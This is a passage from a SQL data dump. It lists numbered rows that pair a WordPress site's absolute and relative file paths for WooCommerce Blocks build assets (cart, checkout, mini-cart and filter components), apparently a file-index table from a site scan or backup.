mmerce/packages/woocommerce-blocks/build/featured-product.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-product.js'),(9919,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper/block.json'),(9920,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-frontend.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-frontend.asset.php'),(9921,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-frontend.js'),(9922,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-rtl.css'),(9923,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-style.asset.php'),(9924,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.asset.php'),(9925,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.css'),(9926,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.js'),(9927,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/handpicked-products/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/handpicked-products/block.json'),(9928,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/handpicked-products-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/handpicked-products-style.asset.php'),(9929,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/handpicked-products.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/handpicked-products.asset.php'),(9930,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/handpicked-products.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/handpicked-products.js'),(9931,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-accepted-payment-methods-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-accepted-payment-methods-block/block.json'),(9932,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-cross-sells-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-cross-sells-block/block.json'),(9933,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-cross-sells-products-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-cross-sells-products-block/block.json'),(9934,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-express-payment-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-express-payment-block/block.json'),(9935,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-items-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-items-block/block.json'),(9936,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-line-items-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-line-items-block/block.json'),(9937,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-block/block.json'),(9938,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-coupon-form-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-coupon-form-block/block.json'),(9939,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-discount-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-discount-block/block.json'),(9940,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-fee-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-fee-block/block.json'),(9941,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-heading-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-heading-block/block.json'),(9942,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-shipping-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-shipping-block/block.json'),(9943,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-subtotal-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-subtotal-block/block.json'),(9944,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-taxes-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-taxes-block/block.json'),(9945,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-totals-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-totals-block/block.json'),(9946,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-actions-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-actions-block/block.json'),(9947,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-billing-address-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-billing-address-block/block.json'),(9948,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-contact-information-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-contact-information-block/block.json'),(9949,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-express-payment-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-express-payment-block/block.json'),(9950,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-fields-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-fields-block/block.json'),(9951,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-note-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-note-block/block.json'),(9952,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-block/block.json'),(9953,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-cart-items-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-cart-items-block/block.json'),(9954,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-coupon-form-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-coupon-form-block/block.json'),(9955,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-discount-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-discount-block/block.json'),(9956,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-fee-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-fee-block/block.json'),(9957,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-shipping-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-shipping-block/block.json'),(9958,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-subtotal-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-subtotal-block/block.json'),(9959,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-taxes-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-taxes-block/block.json'),(9960,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-payment-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-payment-block/block.json'),(9961,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-pickup-options-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-pickup-options-block/block.json'),(9962,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-address-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-address-block/block.json'),(9963,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-method-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-method-block/block.json'),(9964,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-methods-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-methods-block/block.json'),(9965,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-terms-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-terms-block/block.json'),(9966,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-totals-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-totals-block/block.json'),(9967,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/empty-cart-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/empty-cart-block/block.json'),(9968,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/empty-mini-cart-contents-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/empty-mini-cart-contents-block/block.json'),(9969,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/filled-cart-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/filled-cart-block/block.json'),(9970,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/filled-mini-cart-contents-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/filled-mini-cart-contents-block/block.json'),(9971,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-cart-button-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-cart-button-block/block.json'),(9972,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-checkout-button-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-checkout-button-block/block.json'),(9973,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-footer-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-footer-block/block.json'),(9974,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-items-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-items-block/block.json'),(9975,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-products-table-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-products-table-block/block.json'),(9976,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-shopping-button-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-shopping-button-block/block.json'),(9977,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-block/block.json'),(9978,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-items-counter-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-items-counter-block/block.json'),(9979,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-label-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-label-block/block.json'),(9980,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/proceed-to-checkout-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/proceed-to-checkout-block/block.json'),(9981,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template-rtl.css'),(9982,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template-style.asset.php'),(9983,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.asset.php'),(9984,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.css'),(9985,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.js'),(9986,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart/block.json'),(9987,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-component-frontend.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-component-frontend.asset.php'),(9988,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-component-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-component-frontend.js'),(9989,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button--mini-cart-contents-block/checkout-button--mini-cart-contents---358acf4e-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button--mini-cart-contents-block/checkout-button--mini-cart-contents---358acf4e-style.js'),(9990,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button-frontend.js'),(9991,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button-style.js'),(9992,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/checkout-button-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/checkout-button-frontend.js'),(9993,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/checkout-button-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/checkout-button-style.js'),(9994,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/empty-cart-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/empty-cart-frontend.js'),(9995,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/empty-cart-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/empty-cart-style.js'),(9996,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/filled-cart-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/filled-cart-frontend.js'),(9997,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/filled-cart-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/filled-cart-style.js'),(9998,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-frontend.js'),(9999,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-rtl.css'),(10000,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-style.js'),(10001,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer.css'),(10002,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/items-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/items-frontend.js'),(10003,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/items-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/items-style.js'),(10004,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table--product-image--product-title-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table--product-image--product-title-style.js'),(10005,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-frontend.js'),(10006,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-rtl.css'),(10007,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-style.js'),(10008,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table.css'),(10009,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/shopping-button-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/shopping-button-frontend.js'),(10010,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/shopping-button-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/shopping-button-style.js'),(10011,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-frontend.js'),(10012,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-items-counter-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-items-counter-frontend.js'),(10013,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-items-counter-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-items-counter-style.js'),(10014,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-label-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-label-frontend.js'),(10015,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-label-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-label-style.js'),(10016,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-style.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/title-style.js'),(10017,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-rtl.css'),(10018,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-style.asset.php'),(10019,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents.asset.php'),(10020,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents.css'),(10021,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents.js'),(10022,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-frontend.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-frontend.asset.php'),(10023,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-frontend.js'),(10024,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-rtl.css'),(10025,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-style.asset.php'),(10026,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart.asset.php'),(10027,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart.css'),(10028,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart.js'),(10029,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/packages-style-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/packages-style-rtl.css'),(10030,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/packages-style-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/packages-style-style.asset.php'),(10031,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/packages-style.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/packages-style.css'),(10032,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter/block.json'),(10033,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-frontend.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-frontend.asset.php'),(10034,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-frontend.js'),(10035,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-rtl.css'),(10036,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-style.asset.php'),(10037,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-wrapper-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-wrapper-frontend.js'),(10038,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-wrapper-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-wrapper-rtl.css'),(10039,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-wrapper.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-wrapper.css'),(10040,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-